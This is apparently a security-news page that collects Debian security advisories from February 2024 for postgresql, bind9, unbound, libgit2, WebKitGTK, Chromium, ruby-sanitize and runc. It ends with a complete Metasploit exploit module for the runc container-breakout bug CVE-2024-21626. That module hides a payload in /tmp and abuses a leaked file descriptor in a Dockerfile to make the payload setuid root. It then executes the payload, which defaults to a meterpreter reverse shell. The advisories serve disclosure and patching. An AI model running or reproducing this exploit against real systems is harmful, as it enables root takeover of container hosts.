Debian Linux Security Advisory 5623-1 - It was discovered that a late privilege drop in the "REFRESH MATERIALIZED VIEW CONCURRENTLY" command could allow an attacker to trick a user with higher privileges to run SQL commands with these permissions.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5623-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
February 14, 2024                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : postgresql-15  
CVE ID         : CVE-2024-0985

It was discovered that a late privilege drop in the "REFRESH MATERIALIZED  
VIEW CONCURRENTLY" command could allow an attacker to trick a user with  
higher privileges to run SQL commands with these permissions.

For the stable distribution (bookworm), this problem has been fixed in  
version 15.6-0+deb12u1.

We recommend that you upgrade your postgresql-15 packages.

For the detailed security status of postgresql-15 please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/postgresql-15

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmXNGWEACgkQEMKTtsN8  
TjaTTA/9HOtLP5LdqTGsquzchn+w+V3WH/WqapW1lw0FZ6UbihaV5E+v1ssef7ty  
Fyr+LsvD7g2gjE6YE+ABGxrYy67rnZWh79TWSK77ReXwzT8Ccz87itxrvUgkVelo  
d0fRlQKWPAtlYOgKAEUcflHzATrf9XJmcr8TdCtISVHAn7kWpdv+kwWUrvp7ZAVm  
Q1rBvTMZKPkP6GRvrSii51FlKaPa8JFmdu9LIPy1WR/ynipxdx3wn/R+hmZ2SHFN  
18KmBd5vAmG8WyvYWGrWx2IntguW0oqC6Lo9pdqgsbC3Uve8RnGfnqP+tLwsB44Q  
82C7uOX3EGDJEAonMXSrgu3jO1v9rjfHF0Gh2Ji6TNmqXwx4bxsMWC6qgqKap4mS  
Y0htECp9juezF9/aaT5zKMynXOpF7U0YmWU5uNW83PZNHJvULYof3SjHvqfnAL6Z  
ZxA5TYcAvm2xD/FFsjzJiLC+hDTCD/nm1R6W/em0qWL7EKhifJFUGjSo5GT8jtc/  
d3dLHPEXAk/SLeXtnSvLmsHIM3T+hl7cmWl37D4tg3XvyztgGC1Blbama81bTAEO  
uj0/ZE+UiMJC2ORywlJljlTlgbaHljBwc3S+H6vaPIDOstDtZLZf46o/x/A2fC97  
Pe59M7w8Salwdp7HZTOIkhFz4cdyMKMb/yd/3jZN9M2jdj6KVao=suSm  
-----END PGP SIGNATURE-----

Debian Security Advisory 5623-1

Debian Linux Security Advisory 5622-1 - It was discovered that a late privilege drop in the "REFRESH MATERIALIZED VIEW CONCURRENTLY" command could allow an attacker to trick a user with higher privileges to run SQL commands with these permissions.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5622-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
February 14, 2024                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : postgresql-13  
CVE ID         : CVE-2024-0985

It was discovered that a late privilege drop in the "REFRESH MATERIALIZED  
VIEW CONCURRENTLY" command could allow an attacker to trick a user with  
higher privileges to run SQL commands with these permissions.

For the oldstable distribution (bullseye), this problem has been fixed  
in version 13.14-0+deb11u1.

We recommend that you upgrade your postgresql-13 packages.

For the detailed security status of postgresql-13 please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/postgresql-13

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmXNGV8ACgkQEMKTtsN8  
TjYPYBAAlJuqv8akj+o9j/7gYbpr2LNymLYvhDuHDtHjMMSoT5zBYxCMtKtgc84v  
aEFLrm+1CAejvV+8kOTN8cbFF2CSacfFKDV2/9JJY/dxKZ50QL92QNPnZ6aq7KeM  
/iX8Sqp58dey+/VyNy9S8Mv2fVRN8g7UprR+hBKNyqtMAW7np+C5LUgOLYJc4Iqc  
DPHTTAcMKSYn5vCCQrF7QbCKEzT9KDena7xax6HPR+8F5EI0TIBXL97naslyoLKK  
oHrZPDl7hDUxw+IBYfpcMHZWQCSpCP50OUDnZBcPVRCatbki6pDdM6lymXhDWxbh  
uRlBAUmuPRozP8qrfh+m2EBb2aRDz2QJlmehrY8J+j0tM0dJi1dX34SSqLd3nFyZ  
/24KZoNwkAXbb+OBZD1jsu1IMxWvZm3QhlGRUXnXF7AyJiKQDaOz2b1W9B19Fmm3  
z6bQaEbgGf0MTtT/IpEwDMqGrnkl210KA/qVl1gFSbLETGjPh0rLY8ANuKNLGuDs  
1yPEULUBm0G7ZO7JgjlfMvZLlbNotz0Jl5jKr0uGdT+q8H8NxDUT7UJlDiUNDXm0  
D0LK1vzhr86fGRW9lG8a+OntOpnHPrWbFi5mVTIcuPmd6ekIvOCTeAg6dLliuLcf  
fFlWOUD20Xxsz8M0Xkd4NEAod67bk4NWzbHA0XSVa6M0z2u1lok=Kp2y  
-----END PGP SIGNATURE-----

Debian Security Advisory 5622-1

Debian Linux Security Advisory 5621-1 - Several vulnerabilities were discovered in BIND, a DNS server implementation, which may result in denial of service.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5621-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffFebruary 14, 2024                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : bind9CVE ID         : CVE-2023-4408 CVE-2023-5517 CVE-2023-5679 CVE-2023-6516                  CVE-2023-50387 CVE-2023-50868Several vulnerabilities were discovered in BIND, a DNS serverimplementation, which may result in denial of service.For the oldstable distribution (bullseye), these problems have been fixedin version 1:9.16.48-1.For the stable distribution (bookworm), these problems have been fixed inversion 1:9.18.24-1.We recommend that you upgrade your bind9 packages.For the detailed security status of bind9 please refer toits security tracker page at:https://security-tracker.debian.org/tracker/bind9Further information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmXMcl8ACgkQEMKTtsN8TjZIvg//cFDic8ui1mjgizp0lnhPN3ckeYRMWPVXCdq6MZR8JOOB5q2EGd+dBhDmTOI2ZCPXzjmFRywwkAVowf5iGVT9cczSXyUUr773w4B9MdYAvVc/RZOZVQtz/45w/qnj+sx7drh71ffkQmGf6xJz1hj6NwBK6faprNmyA81gTVvoE2aDBfY5d2gRa0m/xKSVbO+DN2Tmh9wAMqXyf+pSQjUNopllUaEo1otLP1TRA/5LnL2UrLiCt0B7Jn9q3QdrYDS9hke9+p9uuoWEIpS/oiNlxnL2bxE4CdAWy93J6qllSUfJo4RQbIcgySCrdESH7fvCk3walvIkq6mQldB6M5JDUYrY/j0IkA/HptIx3R3+CbBJYu/5ark7/XHVKaTzw5aoerv8JK8NljRlXuG86r/lTjRmObr7WiHBssxgsenfrGcAyXQoKusRwZASgbzh6CiZmg9Ihaqf1DixQ5R/9G/qlyQWDIfXVpevmyBmYPHKymIK2fMHjXTqF/6xBzwzmuKQJGm4Gf4X9gYmvMNx9gh6dqK+hJf6/3ifzuZ4Wx5XMp2ZnlRBENvVfzF/Kk07ej+1UE8QcYAdNSynXQqFmo5+kfGHemtZRmKzqECPJoVYFSWJ09FTXsXo/8je0wDkgZfhuaQ7lhfiXEztFz2dmzOrlc18NUSXyaWhzQFHqP53fQc==mhef-----END PGP SIGNATURE-----

Debian Security Advisory 5621-1

Debian Linux Security Advisory 5620-1 - Two vulnerabilities were discovered in unbound, a validating, recursive, caching DNS resolver. Specially crafted DNSSEC answers could lead unbound down a very CPU intensive and time costly DNSSEC (CVE-2023-50387) or NSEC3 hash (CVE-2023-50868) validation path, resulting in denial of service.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5620-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoFebruary 14, 2024                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : unboundCVE ID         : CVE-2023-50387 CVE-2023-50868Debian Bug     : 1063845Two vulnerabilities were discovered in unbound, a validating, recursive,caching DNS resolver. Specially crafted DNSSEC answers could leadunbound down a very CPU intensive and time costly DNSSEC(CVE-2023-50387) or NSEC3 hash (CVE-2023-50868) validation path,resulting in denial of service.Details can be found athttps://nlnetlabs.nl/downloads/unbound/CVE-2023-50387_CVE-2023-50868.txtFor the oldstable distribution (bullseye), these problems have been fixedin version 1.13.1-1+deb11u2.For the stable distribution (bookworm), these problems have been fixed inversion 1.17.1-2+deb12u2.We recommend that you upgrade your unbound packages.For the detailed security status of unbound please refer to its securitytracker page at:https://security-tracker.debian.org/tracker/unboundFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmXMYixfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0TxMxAAmy00/kTKXoaX+YGFHPIZmwdtP/eQnx9SreT40TrvASi7O5d/LKQUhMpYfEPqekyPCmfa/XkFZZVecyaNInoeyuf2olpQ5+gTgZMoxllccCFWqyO+TVhJtobf8iJttIwwdGYToH/tENr2Ady2Rgg5oy8WILF/5F2bckn2dgQAWUw4Tl7K9rkCf1JryO4KJGhXtNpaQZJnvX5dmwm7gDwkXsc9j85diRTRUF14IaMiiPKUpcxmogOGDYJcvY6lBFdLOfmzo1f3BO8SzNV+G0h7kCn/7w9RdpOWqTQoZHdT6IkT0YsZzLuJ0bVyoLWxi8Kh4fdAbEiyffVk0kLOWUmup9hckUSIXQktvOK6koFecm01W8OBzQ/HsB/DNExfo1l7GjAaAv+EkQHMdkiMqdoLI4oduuBxa2nFdCpDESaTN7Li6S0JtVc1YUu+UKHido3J0/U4xleL8sPPupJ2yVwOmbkeqK3hxH0J+e/uDT6mfrZ0moEEjOyAper8lqu4TS7rSK0e6/nNQs8dEEcoQQL1B3HXyXqjOBcMM4A1wPkJib8j2use64/+vIz69tMflOwUxBirQ/J4PGLWTQmIoxF6NNzqTWgeFMIuq1NXIy7t3TPIIgW3+VWsNJwKAe8HGZITdiBpGdSDFEa5qYKtiYQS6NxSx/fzyYNlfv7rUzrSNgQ==m2j/-----END PGP SIGNATURE-----

Debian Security Advisory 5620-1

Debian Linux Security Advisory 5619-1 - Two vulnerabilities were discovered in libgit2, a low-level Git library, which may result in denial of service or potentially the execution of arbitrary code.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5619-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffFebruary 09, 2024                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : libgit2CVE ID         : CVE-2024-24577 CVE-2024-24575Two vulnerabilities were discovered in libgit2, a low-level Git library,which may result in denial of service or potentially the execution ofarbitrary code.For the oldstable distribution (bullseye), this problem has been fixedin version 1.1.0+dfsg.1-4+deb11u2.For the stable distribution (bookworm), this problem has been fixed inversion 1.5.1+ds-1+deb12u1.We recommend that you upgrade your libgit2 packages.For the detailed security status of libgit2 please refer toits security tracker page at:https://security-tracker.debian.org/tracker/libgit2Further information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmXGeNgACgkQEMKTtsN8TjatpBAAtY1nwqlQFnE//mah+rLfyeOtoM0XutnWZasAALawlg6h9RKMaOy7R1D3MKk5o4i5U7KqQih6YtCTy4JDfgZzJ+kCVXD5uEWEW6qRZGnEMXYtgrAUkG7VNCcGMwGei4nQFf1ZyCsP1ShaWyXa/sVkLtVYvqrWdXRSxf9p5Ky3lQh3cd9GXK3sWUbnzF3UK0ZFkocEmIX4qLE60s1bMQb/IrlgXguSutMqC5EHiVRhBvINmf3zC+ggLvk5fNre4rKns7RizMrkBKYFVwCeCXaBtKYhyE7T3otWu5mGsanE1c7aGTZDIH9HpRsT1JR9W5XI5HcDusajDJNy5v+Wl2/ohIfB3kECsfPITVql832X5DtqSNazNLA0RnYuAOa+7wElLrh6X2yFrahViOmie4smfc97LznpPhAXqy++jxnnYDTLUK/BCX3bIp5RkCTz5s6fsi64/2SO9KQscw+zKzKHSrIuPU42JYxfpo17kVDWfhU0mUbyygKFQmSKUQndaGUYpLXk7Iv4aoAXXRlWjV21uxxByKziDfHalTfthp2BjTmVdEutD/cc6Uwk9OJFnCMPBat07l4HlOypv0iYddNj7HVqOvgQz7NUuYLuDvC8VwdLgy4XyI8HnKmFOpMv04eqbwbTnv8uKvvvFMOMLWUEkS081a5tHmdVx0mJWInRW5k==ixWD-----END PGP SIGNATURE-----

Debian Security Advisory 5619-1

Debian Linux Security Advisory 5618-1 - Vulnerabilities have been discovered in the WebKitGTK web engine. An anonymous researcher discovered that a maliciously crafted webpage may be able to fingerprint the user. Wangtaiyu discovered that processing web content may lead to arbitrary code execution. Apple discovered that processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been exploited.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5618-1                   security@debian.org  
https://www.debian.org/security/                           Alberto Garcia  
February 08, 2024                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : webkit2gtk  
CVE ID         : CVE-2024-23206 CVE-2024-23213 CVE-2024-23222

The following vulnerabilities have been discovered in the WebKitGTK  
web engine:

CVE-2024-23206

    An anonymous researcher discovered that a maliciously crafted  
    webpage may be able to fingerprint the user.

CVE-2024-23213

    Wangtaiyu discovered that processing web content may lead to  
    arbitrary code execution.

CVE-2024-23222

    Apple discovered that processing maliciously crafted web content  
    may lead to arbitrary code execution. Apple is aware of a report  
    that this issue may have been exploited.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 2.42.5-1~deb11u1.

For the stable distribution (bookworm), these problems have been fixed in  
version 2.42.5-1~deb12u1.

We recommend that you upgrade your webkit2gtk packages.

For the detailed security status of webkit2gtk please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/webkit2gtk

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEYrwugQBKzlHMYFizAAyEYu0C2AIFAmXFXGQACgkQAAyEYu0C  
2AJWJA//fFEMVOvrgBf8I2Nnz37Bm/jR4IRM52osjsI6I23tjJ1vA9UR7Y/03QGN  
qOzfOsb6wcRGZfYdEy945N6vf/XN3opl44ApyJ6RHStbQ8EuTw+IXVSKs49x6FBC  
P7glTc3I4R5gYpOKDwc/jQwkB6VeCYPq0LeqgVNx2/Ja0eJ3KUEjXo+yYJbowRj+  
oiR9R+WKIEnz7BdxMbOLrlHc9CpR3UynozFprFha8bKNlyJAq/hwsO546NgYnSQH  
+n/hAad1NDvcptljLHrXjw/GYTVc2lEGoFFr8H8EDVdWrtzSlecHenthIxfjoKL9  
4eWGvilyZJGAKvtlaNRCFNorHTsAcqRUYhDT87TNScU+ONwdk3tdl9d4F/CcTylA  
7ZQGQ1OQk2f5h/E2Ns1CD0KE64+Qv4Eima/A7VNDKc2hXPNavaekIbziVKEJ4r+m  
ypJrJDm+RLeOcDKuyxfz6REQvAOinjMnfPQhMXRCdk4vz3RXl9bEpoao35C2rtLe  
HcL3/tg24hOooj6NJYQRuiKfmrZKhHivNrg4QJ/71Y1/JXtlmLiol6h8nfKKvb19  
ObFGbF27htKmSGXR3Oig5tQWcjhnbH4CSqXoTOYwDPRgb9dutViclKu605A97Fm5  
l5U0fyIT8mwkN/thk8KOE1AtNC2n90Y9Yx/gBPFRypHN+CBQCbY=  
=Lfkz  
-----END PGP SIGNATURE-----

Debian Security Advisory 5618-1

Debian Linux Security Advisory 5617-1 - Multiple security issues were discovered in Chromium, which could result in the execution of arbitrary code, denial of service or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- -------------------------------------------------------------------------Debian Security Advisory DSA-5617-1                   security@debian.orghttps://www.debian.org/security/                           Andres SalomonFebruary 08, 2024                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2024-1283 CVE-2024-1284Multiple security issues were discovered in Chromium, which could resultin the execution of arbitrary code, denial of service or informationdisclosure.For the stable distribution (bookworm), these problems have been fixed inversion 121.0.6167.160-1~deb12u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIyBAEBCAAdFiEEUAUk+X1YiTIjs19qZF0CR8NudjcFAmXEllwACgkQZF0CR8NudjcIrQ/4nDJyajY62INMkRpAFjT9a7+IDO5ozl2IcYf7+Jz11HhZmc891MSHbnFEVeZfaCFGmt6Xo9WRwvDlkDjAiQ7jA571PoNE8cF3oaLpD6+6/oj2apUpD7LkTNaviWRct19zRflJyhehYl2oxR7A0Yi6GTvGtn+azkhoqYTSw9WWdFzKNI1wmpID0bxp+CgtzZmVkDCa0WFM4MP2C+IdGWzhBTc9+7VggO91ATAwHscSJ/2D3jJVJMVP8vKqla6QJabGwo7N3wRE3aB3YybluhvYWzhaOmf8oNavwFarEwrEhm5siJWadkte7OlZeusBfONZVircFx4zqfYqilyCLx384qlKyRtjwMwiTE/vk61xm3dl6AV5mUIbyVu4FUIVTftBBE0mwW055ncDCEy3FgEc3ZRxFdvolcWJhONt6f8jAn6iOfH82nQ8SfVmgpQPP2eKLHT/l9IT9T0blJYlNIjXM1T4IjMZvtFb7KUp9rP/T2UDDKwxR8ahs0/EC7FubjjzhnmZFAe/L2xFlM612Fl+C+6mgqUH0oS0TF6CLmWH1gNuXUFjiyVL+zkQA7Fcp6iiUdhSrEAz8y+Igv0Ty2n06xRxkUF3t1SG6XxAxbKW3BuyEz5B9fivLh9KzXGiXWHrvpTHvNYMuKPXeOM9QvcFKhzXLvcWRpirgC22ca7JNA===+kgA-----END PGP SIGNATURE-----

Debian Security Advisory 5617-1

Debian Linux Security Advisory 5616-1 - It was discovered that ruby-sanitize, a whitelist-based HTML sanitizer, insufficiently sanitized style elements, which may result in cross-site scripting.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5616-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffFebruary 05, 2024                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : ruby-sanitizeCVE ID         : CVE-2023-36823It was discovered that ruby-sanitize, a whitelist-based HTML sanitizer,insufficiently sanitised <style> elements, which may result incross-site scripting.For the oldstable distribution (bullseye), this problem has been fixedin version 5.2.1-2+deb11u1.For the stable distribution (bookworm), this problem has been fixed inversion 6.0.0-1.1+deb12u1.We recommend that you upgrade your ruby-sanitize packages.For the detailed security status of ruby-sanitize please refer toits security tracker page at:https://security-tracker.debian.org/tracker/ruby-sanitizeFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmXBWGUACgkQEMKTtsN8TjZKxRAAmKe0iFtImy6hV4qVVAAWxtWArqFhQlMS6SDiBdkkN+0Ep3QMnBX1DKdqHYjtaKSaSr6ho6oWtmQQc4YQfVze+EwQfCQKERYenoJtYS1ljsfrmMpnF6dmonOJzG5W9nf/8JVqmUwwmVCEGtATPBWu7SqLb5zkKqh6zPyf853bNBAqjE6z+CbWaYEkCkIsfe7euOOW3zIIF2GiYCZBEkM9HieehyZdDVOlwTsIlMiELU5BX1eAFAdyBZhoky88c2N4a0uSE8WWXoaNJN5T55sAv1DdqQF0sqfWxOXmmhcu6xbpif4Qh82CO58awW+m/DUHwqSr5pSey2AlThamV0H9CvKOkhZZWQ67ew9HpDEd2AW9aOv0TKuCMGBXqovvSHjvmAI6Jg4VlFe1rD9yFXEhvB5A34/9mh3IRKSk01jrGXIkDqYGPYGEbAle/qGwrTQvUou/js5flST87i3YYh0J8+WzldtVt42jr4RbjcvVefe+sQA8G0ILEgM/+CYjMjSjefnJkTEjGOix522D/qukpBimLjPL+/28Vk41PzF8+q4t665oqpNFHaaGTlrjnoo0HXAxKDpSoK6LbclQGmPjRDe/CFBEUj7tAY5IUXt4yiNLlil3bCCAM5czlnVx3V1Cs236JTwVjR1YFtPUf5/tL7cLyPeelQWenHQ/YJDf4dk==5owE-----END PGP SIGNATURE-----

Debian Security Advisory 5616-1

Debian Linux Security Advisory 5615-1 - It was discovered that runc, a command line client for running applications packaged according to the Open Container Format (OCF), was susceptible to multiple container break-outs due to an internal file descriptor leak.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5615-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffFebruary 04, 2024                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : runcCVE ID         : CVE-2024-21626It was discovered that runc, a command line client for runningapplications packaged according to the Open Container Format (OCF), wassuspectible to multiple container breakouts due to an internal filedescriptor leak.For the oldstable distribution (bullseye), this problem has been fixedin version 1.0.0~rc93+ds1-5+deb11u3.For the stable distribution (bookworm), this problem has been fixed inversion 1.1.5+ds1-1+deb12u1.We recommend that you upgrade your runc packages.For the detailed security status of runc please refer toits security tracker page at:https://security-tracker.debian.org/tracker/runcFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmW/2/oACgkQEMKTtsN8TjbbzxAAh2354+lngRRQ7hLtEYgFa8SrkJmgIAMPvR5S1fNWh60wOdUG1690QuzxQm19ZpcF/QJFw6yefECYHWMzmqBJiv2WNadGOT7S9YqZ+ILz/ohwA+1HjH92F/Xl5BTA+Rg9O2hTSqGdDUB8qPpz0/mBin89m1B0y6xpLgF2C/3NiNkOeiuSmVcMsAc/h64VovNPuRGz3/VcPPyO85avjL6ZXEA9L48dPoliTzonNOk+DRgYb4YsFTP1T0RcyrchTLljMkCx2l8gVWKD0BLtH8wDO12kOAlAtnPN9ufB9FXfe9axobvOYalYzOca5/kvRVZ246GwyUG+OM9y01AJsZzKMHnqcT8T3q27FRGu9OFYMN0gONnTLiwEYrjxonzBApm0OPg5XqflRTxVL154tIQi9jmyxGDsHdRmtBCeQw2B7bvoX/bpFijcjvP3FLSWkKmduGocrYm4FgnwiYgh4714fo56HZG4x9u+Y4iplPQWlnv9dEVAzw/oUGr+z0s1TJLfZYEZSpmju2e7afiZbRHdB7YBx8wj02R7yIJJF2sF3tk5eo2UpRJzBSwaolek8b4PcQBsT5h8UAmT0z6WhSFOXwjhmkMD61OFUoPEmWlXJz9VbbWuqmd4R23iYq3r9nkaieQutrbc+i7EXMUT42ogZgOFBG1mQPXeL8PECXfnazs==H2CG-----END PGP SIGNATURE-----

Debian Security Advisory 5615-1

runc versions 1.1.11 and below, as used by containerization technologies such as Docker engine and Kubernetes, are vulnerable to an arbitrary file write vulnerability. Due to a file descriptor leak it is possible to mount the host file system with the permissions of runc (typically root). Successfully tested on Ubuntu 22.04 with runc 1.1.7-0ubuntu1~22.04.1 using Docker build.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Local  Rank = ExcellentRanking  include Msf::Post::Linux::Priv  include Msf::Post::Linux::System  include Msf::Post::File  include Msf::Exploit::EXE  include Msf::Exploit::FileDropper  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'runc (docker) File Descriptor Leak Privilege Escalation',        'Description' => %q{          All versions of runc <=1.1.11, as used by containerization technologies such as Docker engine,          and Kubernetes are vulnerable to an arbitrary file write.          Due to a file descriptor leak it is possible to mount the host file system          with the permissions of runc (typically root).          Successfully tested on Ubuntu 22.04 with runc 1.1.7-0ubuntu1~22.04.1 using Docker build.        },        'License' => MSF_LICENSE,        'Author' => [          'h00die', # msf module          'Rory McNamara' # Discovery        ],        'Platform' => [ 'linux' ],        'Arch' => [ ARCH_X86, ARCH_X64 ],        'SessionTypes' => [ 'shell', 'meterpreter' ],        'Targets' => [[ 'Auto', {} ]],        'Privileged' => true,        'References' => [          [ 'URL', 'https://snyk.io/blog/cve-2024-21626-runc-process-cwd-container-breakout/'],          [ 'URL', 'https://github.com/opencontainers/runc/security/advisories/GHSA-xr7r-f8xq-vfvv'],          [ 'CVE', '2024-21626']        ],        'DisclosureDate' => '2024-01-31',        'DefaultTarget' => 0,        'Notes' => {          'AKA' => ['Leaky Vessels'],          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [ARTIFACTS_ON_DISK]        },        'DefaultOptions' => {          'EXITFUNC' => 'thread',          'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',          'MeterpreterTryToFork' => true        }      )    )    register_advanced_options [      OptString.new('WritableDir', [ true, 'A directory where we can write and execute files', '/tmp' ]),      OptString.new('DOCKERIMAGE', [ true, 'A docker image to use', 'alpine:latest' ]),      OptInt.new('FILEDESCRIPTOR', [ true, 'The file descriptor to use, typically 7, 8 or 9', 8 ]),    ]  end  def base_dir    datastore['WritableDir'].to_s  end  def check    sys_info = get_sysinfo    unless sys_info[:distro] == 'ubuntu'      return CheckCode::Safe('Check method only available for Ubuntu systems')    end    return CheckCode::Safe('Check method only available for Ubuntu systems') if executable?('runc')    # Check the app is installed and the version, debian based example    package = cmd_exec('runc --version')    package = package.split[2] # runc, version, <the actual version>    if package&.include?('1.1.7-0ubuntu1~22.04.1') || # jammy 22.04 only has 2 releases, .1 (vuln) and .2       package&.include?('1.0.0~rc10-0ubuntu1') || # focal only had 1 release prior to patch, 1.1.7-0ubuntu1~20.04.2 is patched       package&.include?('1.1.7-0ubuntu2') # mantic only had 1 release prior to patch, 1.1.7-0ubuntu2.2 is patched      return CheckCode::Appears("Vulnerable runc version #{package} detected")    end    unless package&.include?('+esm') # bionic patched with 1.1.4-0ubuntu1~18.04.2+esm1 so anything w/o +esm is vuln      return CheckCode::Appears("Vulnerable runc version #{package} detected")    end    CheckCode::Safe("runc #{package} is not vulnerable")  end  def exploit    # Check if we're already root    if !datastore['ForceExploit'] && is_root?      fail_with Failure::None, 'Session already has root privileges. Set ForceExploit to override'    end    # Make sure we can write our exploit and payload to the local system    unless writable? base_dir      fail_with Failure::BadConfig, "#{base_dir} is not writable"    end    # create directory to write all our files to    dir = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"    mkdir(dir)    register_dirs_for_cleanup(dir)    # Upload payload executable    payload_path = "#{dir}/.#{rand_text_alphanumeric(5..10)}"    vprint_status("Uploading Payload to #{payload_path}")    write_file(payload_path, generate_payload_exe)    register_file_for_cleanup(payload_path)    # write docker file    vprint_status("Uploading Dockerfile to #{dir}/Dockerfile")    dockerfile = %(FROM #{datastore['DOCKERIMAGE']}    WORKDIR /proc/self/fd/#{datastore['FILEDESCRIPTOR']}    RUN cd #{'../' * 8} && chmod -R 777 #{dir[1..]} && chown -R root:root #{dir[1..]} && chmod u+s #{payload_path[1..]} )    write_file("#{dir}/Dockerfile", dockerfile)    register_file_for_cleanup("#{dir}/Dockerfile")    print_status('Building from Dockerfile to set our payload permissions')    output = cmd_exec "cd #{dir} && docker build ."    output.each_line { |line| vprint_status line.chomp }    # delete our docker image    if output =~ /Successfully built ([a-z0-9]+)$/      print_status("Removing created docker image #{Regexp.last_match(1)}")      output = cmd_exec "docker image rm #{Regexp.last_match(1)}"      output.each_line { |line| vprint_status line.chomp }    end    fail_with(Failure::NoAccess, "File Descriptor #{datastore['FILEDESCRIPTOR']} not available, try again (likely) or adjust FILEDESCRIPTOR.") if output.include? "mkdir /proc/self/fd/#{datastore['FILEDESCRIPTOR']}: not a directory"    fail_with(Failure::NoAccess, 'Payload SUID bit not set') unless get_suid_files(payload_path).include? payload_path    print_status("Payload permissions set, executing payload (#{payload_path})...")    cmd_exec "#{payload_path} &"  endend

Tag

#debian